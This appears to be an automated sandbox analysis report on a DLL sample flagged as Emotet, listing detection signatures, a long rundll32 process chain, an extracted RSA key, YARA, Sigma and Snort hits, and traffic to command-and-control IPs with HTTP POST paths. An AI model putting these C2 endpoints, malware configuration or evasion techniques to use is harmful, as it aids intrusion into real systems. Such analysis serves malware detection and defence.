Loading ...

Play interactive tourEdit tour

Analysis Report zGeK5so94c

Overview

General Information

Sample Name:zGeK5so94c (renamed file extension from none to dll)
Analysis ID:344305
MD5:49fbffd7602b52f05848a6016d42ec89
SHA1:b57bb387a15b3c0e10a236f3861420a9dac980cb
SHA256:1859099c09c69aa811c525e9e70787c49048e3c24814d31ea2a17905cfad9d18

Most interesting Screenshot:

Detection

Emotet
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
Sigma detected: Suspicious Call by Ordinal
Uses known network protocols on non-standard ports
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to delete services
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (may stop execution after accessing registry keys)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains strange resources
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 7100 cmdline: loaddll32.exe 'C:\Users\user\Desktop\zGeK5so94c.dll' MD5: 2D39D4DFDE8F7151723794029AB8A034)
    • WerFault.exe (PID: 4812 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 240 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 6620 cmdline: rundll32.exe C:\Users\user\Desktop\zGeK5so94c.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 1000 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Desktop\zGeK5so94c.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 6040 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hbjpd\usib.lxs',dldZeiafGYsN MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • rundll32.exe (PID: 5760 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\Hbjpd\usib.lxs',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
            • rundll32.exe (PID: 5132 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\Hbjpd\pixmxoo.dll',#1 NAQAAB4AAABIAGIAagBwAGQAXAB1AHMAaQBiAC4AbAB4AHMAAAA= MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
              • rundll32.exe (PID: 5872 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hbjpd\usib.lxs',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                • rundll32.exe (PID: 6312 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hlqxmsfzi\jjvjowsk.xoz',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                  • rundll32.exe (PID: 6132 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bdtgy\atyx.hvl',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                    • rundll32.exe (PID: 1260 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cfwgvspim\fwvopxwu.wpy',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                      • rundll32.exe (PID: 6932 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ibbigqfuoubc\tiynxefumvm.jsi',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                        • rundll32.exe (PID: 6692 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Aziiwkqaqp\dnweyyfur.lyr',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                          • rundll32.exe (PID: 5360 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uchtpmhcpt\nfuoltapn.fge',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                            • rundll32.exe (PID: 5504 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zvrxg\husq.avr',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                              • rundll32.exe (PID: 4684 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jcoinynbga\etdgpznst.qoo',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                • rundll32.exe (PID: 4940 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bfurjavtsbwkajdv\sfvtpwqlhvedlny.xdk',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                  • rundll32.exe (PID: 6048 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Msjhyngbojq\bihctgwrjw.jsh',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                    • rundll32.exe (PID: 4184 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mntpro\pwmgi.sow',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                      • rundll32.exe (PID: 4632 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sioetxuvrihjyxu\wsarziebmecgqp.weo',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                        • rundll32.exe (PID: 4752 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jvotvplywpzb\qwoawgsuzao.fmz',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                          • rundll32.exe (PID: 6568 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ofqhxlaxbkixqlny\iogmsr.ktr',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                            • rundll32.exe (PID: 980 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usfyyrevasc\hoztidaylv.ruq',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                              • rundll32.exe (PID: 6020 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wzvizgyhx\mlhiyaxu.lik',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                                • rundll32.exe (PID: 5840 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Tthpthgifqmjjt\idvrfaaidqwxo.flr',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                                  • rundll32.exe (PID: 6556 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jdedkdp\loyrno.rpx',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                                    • rundll32.exe (PID: 6288 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwmln\clyk.jxd',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • svchost.exe (PID: 7108 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 7156 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 7100 -ip 7100 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 6848 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6788 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6008 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAKmd+Pam+7HWeoRnZCmLHfQX3/RRijh6\nbPqYGHGBBGcEQb+EOfmkdG0BnTZfvg2iXKB8yhPQsHPR9nZoyMt7OWPYA080O3zM\nzB7+nWmsc0YPpSte4JR7YPZYIpxXZs7fFwIDAQAB"}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
zGeK5so94c.dllJoeSecurity_EmotetYara detected EmotetJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000005.00000002.679972484.00000000729E1000.00000020.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000004.00000002.678150026.00000000729E1000.00000020.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000007.00000002.773552883.00000000729E1000.00000020.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000006.00000002.680588418.00000000729E1000.00000020.00020000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            6.2.rundll32.exe.729e0000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              4.2.rundll32.exe.729e0000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                7.2.rundll32.exe.729e0000.2.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  5.2.rundll32.exe.729e0000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security

                    Sigma Overview

                    System Summary:

                    barindex
                    Sigma detected: Suspicious Call by OrdinalShow sources
                    Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Desktop\zGeK5so94c.dll',#1, CommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Desktop\zGeK5so94c.dll',#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\zGeK5so94c.dll,Control_RunDLL, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 6620, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Desktop\zGeK5so94c.dll',#1, ProcessId: 1000

                    Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Antivirus / Scanner detection for submitted sampleShow sources
                    Source: zGeK5so94c.dllAvira: detected
                    Machine Learning detection for sampleShow sources
                    Source: zGeK5so94c.dllJoe Sandbox ML: detected
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F545700 RegOpenKeyA,EncryptFileA,VirtualAlloc,Sleep,ExitProcess,
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F542180 Sleep,Module32NextW,GetCommandLineW,CommandLineToArgvW,lstrlenW,CryptStringToBinaryW,LocalFree,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,OpenProcess,QueryFullProcessImageNameW,CloseHandle,

                    Compliance:

                    barindex
                    Uses 32bit PE filesShow sources
                    Source: zGeK5so94c.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                    Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
                    Source: zGeK5so94c.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                    Binary contains paths to debug symbolsShow sources
                    Source: Binary string: aqmjrtmCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000003.00000002.673102798.0000000002E72000.00000004.00000010.sdmp
                    Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000003.00000003.668945836.00000000050C1000.00000004.00000001.sdmp
                    Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000003.00000003.668945836.00000000050C1000.00000004.00000001.sdmp
                    Source: Binary string: wntdll.pdb source: WerFault.exe, 00000003.00000003.668945836.00000000050C1000.00000004.00000001.sdmp
                    Source: Binary string: apphelp.pdb source: WerFault.exe, 00000003.00000003.668945836.00000000050C1000.00000004.00000001.sdmp
                    Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000003.00000003.668945836.00000000050C1000.00000004.00000001.sdmp
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_6F558C1D FindFirstFileExA,

                    Networking:

                    barindex
                    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                    Source: TrafficSnort IDS: 2404322 ET CNC Feodo Tracker Reported CnC Server TCP group 12 192.168.2.4:49745 -> 190.55.186.229:80
                    Source: TrafficSnort IDS: 2404326 ET CNC Feodo Tracker Reported CnC Server TCP group 14 192.168.2.4:49750 -> 203.157.152.9:7080
                    Uses known network protocols on non-standard portsShow sources
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 7080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7080 -> 49750
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 7080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 7080 -> 49750
                    Source: global trafficTCP traffic: 192.168.2.4:49750 -> 203.157.152.9:7080
                    Source: Joe Sandbox ViewIP Address: 203.157.152.9 203.157.152.9
                    Source: Joe Sandbox ViewIP Address: 190.55.186.229 190.55.186.229
                    Source: Joe Sandbox ViewASN Name: MOPH-TH-APInformationTechnologyOfficeSG MOPH-TH-APInformationTechnologyOfficeSG
                    Source: Joe Sandbox ViewASN Name: TelecentroSAAR TelecentroSAAR
                    Source: global trafficTCP traffic: 192.168.2.4:49745 -> 190.55.186.229:80
                    Source: global trafficHTTP traffic detected: POST /2ijyf1/txor3som/z3prsr3ev/l8z0/1k9au09l0vb/ HTTP/1.1DNT: 0Referer: 203.157.152.9/2ijyf1/txor3som/z3prsr3ev/l8z0/1k9au09l0vb/Content-Type: multipart/form-data; boundary=---------FFexYarq3User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 203.157.152.9:7080Content-Length: 6212Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /k8idqdr2/ HTTP/1.1DNT: 0Referer: 203.157.152.9/k8idqdr2/Content-Type: multipart/form-data; boundary=-----------QeejNQ4AFByUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 203.157.152.9:7080Content-Length: 5732Connection: Keep-AliveCache-Control: no-cache
                    Source: unknownTCP traffic detected without corresponding DNS query: 190.55.186.229
                    Source: unknownTCP traffic detected without corresponding DNS query: 190.55.186.229
                    Source: unknownTCP traffic detected without corresponding DNS query: 190.55.186.229
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: unknownTCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: svchost.exe, 0000000E.00000002.780262816.000001D9CB130000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.facebook.com (Facebook)
                    Source: svchost.exe, 0000000E.00000002.780262816.000001D9CB130000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.twitter.com (Twitter)
                    Source: svchost.exe, 0000000E.00000002.780262816.000001D9CB130000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-01-22T08:15:59.5362912Z||.||7d25cb34-9460-4ea4-a627-d9782709c6d8||1152921505692809496||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                    Source: svchost.exe, 0000000E.00000002.780262816.000001D9CB130000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-01-22T08:15:59.5362912Z||.||7d25cb34-9460-4ea4-a627-d9782709c6d8||1152921505692809496||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
